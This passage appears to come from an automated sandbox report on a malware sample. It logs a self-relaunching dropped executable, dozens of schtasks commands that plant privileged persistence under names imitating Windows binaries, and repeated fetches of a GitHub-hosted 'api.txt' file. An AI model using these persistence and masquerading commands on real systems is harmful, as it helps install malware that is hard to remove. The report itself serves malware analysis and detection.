C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F1gdtReUkn.bat"15⤵PID:4956
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:216⤵PID:4524
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\574RqM7W2b.bat"17⤵PID:2000
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:218⤵PID:4984
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"19⤵PID:660
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:220⤵PID:4188
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EqBdbgL5Ji.bat"21⤵PID:4032
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:222⤵PID:4712
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lHo4kC1bcD.bat"23⤵PID:2488
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:224⤵PID:4812
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\D5faDLbbQ0.bat"25⤵PID:1216
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:226⤵PID:2904
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"27⤵PID:2340
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:228⤵PID:4640
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"28⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\System\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\System\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\Migration\WTR\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 5 /tr "'C:\Users\Default\DllCommonsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\Default\DllCommonsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 6 /tr "'C:\Users\Default\DllCommonsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1268
Network
-
Remote address:8.8.8.8:53Request104.219.191.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.109.133
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:01 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600020-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841741.206968,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a15c5b71e4d756129bff8f22ca44d0252ae9e134
Expires: Sun, 22 Dec 2024 04:34:01 GMT
Source-Age: 228
-
Remote address:8.8.8.8:53Request133.110.199.185.in-addr.arpaIN PTRResponse133.110.199.185.in-addr.arpaIN PTRcdn-185-199-110-133githubcom
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:14 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4258-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841754.355583,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9687e36e665bead5408d5ff57cde745dfb9700ac
Expires: Sun, 22 Dec 2024 04:34:14 GMT
Source-Age: 161
-
Remote address:8.8.8.8:53Request50.23.12.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request65.139.73.23.in-addr.arpaIN PTRResponse65.139.73.23.in-addr.arpaIN PTRa23-73-139-65deploystaticakamaitechnologiescom
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:29 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600039-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841770.662053,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6a706c119f1307aeaa872a3e587e373529c487cd
Expires: Sun, 22 Dec 2024 04:34:29 GMT
Source-Age: 256
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:41 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600083-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841781.471472,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 953e7901b703ededd798c05b19c8e6df543f00cd
Expires: Sun, 22 Dec 2024 04:34:41 GMT
Source-Age: 268
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:55 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420112-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841795.165508,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 89320ee43a42c83a45c1b35555764241b58f3e4e
Expires: Sun, 22 Dec 2024 04:34:55 GMT
Source-Age: 202
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600036-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841808.412225,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 496a335da1f09cb9391eb4e8cdf3ae4c86baedf2
Expires: Sun, 22 Dec 2024 04:35:08 GMT
Source-Age: 295
-
Remote address:8.8.8.8:53Request48.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:20 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600094-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841821.833181,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 5225e74bce1ee9127072b92d4cefd5bd6d061e17
Expires: Sun, 22 Dec 2024 04:35:20 GMT
Source-Age: 4
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:28 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841829.600212,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a91384b30d45fa1945f4c1872cec39ea1530cafe
Expires: Sun, 22 Dec 2024 04:35:28 GMT
Source-Age: 12
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:42 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600039-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841843.903808,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e69e6572d3f9527b0ea53993e77c0f5fff3567f1
Expires: Sun, 22 Dec 2024 04:35:42 GMT
Source-Age: 26
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:56 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600023-LCY
X-Cache: HIT
X-Cache-Hits: 3
X-Timer: S1734841856.121539,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f1d1c2d8e2fed86d87a1d98360e117ec56ebfc3a
Expires: Sun, 22 Dec 2024 04:35:56 GMT
Source-Age: 39
-
Remote address:185.199.110.133:443RequestGET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:31:03 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600044-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841864.881667,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
